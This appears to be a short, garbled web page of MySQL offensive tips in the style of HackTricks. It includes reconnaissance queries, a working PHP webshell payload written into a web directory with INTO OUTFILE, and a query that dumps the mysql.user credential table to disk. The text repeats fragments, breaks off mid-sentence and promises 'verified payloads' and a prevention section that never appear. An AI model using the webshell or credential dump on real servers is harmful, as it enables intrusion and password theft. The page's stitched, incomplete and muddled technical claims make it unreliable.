Mysql Hacktricks Verified

SELECT @@version, @@version_compile_os, @@version_compile_machine;
SELECT user(), database(), current_user();
SELECT @@basedir, @@datadir, @@plugin_dir;

HackTricks Insight:
current_user() shows the user MySQL is authenticating you as, while user() shows the user you tried to connect as. Mismatches often indicate proxy authentication or privilege mapping.

This is the pivot point for most MySQL hacks. If secure_file_priv is not restricting you to a specific directory, you can write files to the disk.

The "HackTrick": You can write a PHP webshell (or any other script) directly into a web directory if you know the path. mysql hacktricks verified

SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';

Why it's interesting:

MySQL can issue HTTP requests via sys_exec() or SELECT ... INTO OUTFILE to write a port scanner script. But a verified light pivot: HackTricks Insight: current_user() shows the user MySQL is

SELECT * FROM mysql.user INTO OUTFILE '/tmp/users.txt';

Then read it via SSH if you have shell access.

If you can't log in directly, SQL injection is your vector. The verified payloads for MySQL are: Why it's interesting:

To detect and prevent MySQL attacks: